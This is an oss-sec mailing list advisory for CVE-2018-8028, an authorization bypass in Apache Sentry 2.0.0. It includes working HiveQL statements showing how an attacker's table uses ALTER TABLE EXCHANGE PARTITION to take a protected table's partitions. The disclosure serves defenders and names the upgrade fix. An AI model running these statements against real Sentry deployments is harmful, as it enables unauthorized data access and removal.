oss-sec mailing list archives
[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS authorization for Hive
From: Sergio Peña <spena82 () gmail com>
Date: Thu, 23 Aug 2018 11:38:32 -0500
[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS authorization for Hive Severity: Major Vendor: The Apache Software Foundation Versions Affected: This vulnerability affects only the version of Apache Sentry 2.0.0 due to the introduction of Hive 2.x. Description: An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without being authorized by Sentry. This can allow an attacker unauthorized access to the partitioned data of a Sentry protected table and can allow an attacker to remove data from a Sentry protected table. Mitigation: Apache Sentry users using 2.0.0 should upgrade to 2.0.1 or later. Example: The admin has created the following table in a database that the attacker doesn't have access to:
CREATE TABLE target_database1.aliens (name string) PARTITIONED BY
(home_planet string, diet string);
ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='earth',
diet='milk shakes');
ALTER TABLE target_database1.aliens ADD PARTITION
(home_planet='trapis-4', diet='sentient lifeforms with cheese'); The attacker has a database attacker_database, created as follows:
CREATE TABLE attacker_database.data_stealer (name string) PARTITIONED BY
(home_planet string, diet string);
ALTER TABLE attacker_database.data_stealer EXCHANGE PARTITION
(home_planet='earth', diet='milk shakes') WITH TABLE target_database1.aliens; The attacker now has access to all of the data in the target partitions with the privileges available to them on attacker_database. Credit: This issue was discovered by Benjamin Iglauer of Cloudera. References: https://cwiki.apache.org/confluence/display/SENTRY/Vulnerabilities+found+in+Apache+Sentry
Current thread:
- [SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS authorization for Hive Sergio Peña (Aug 23)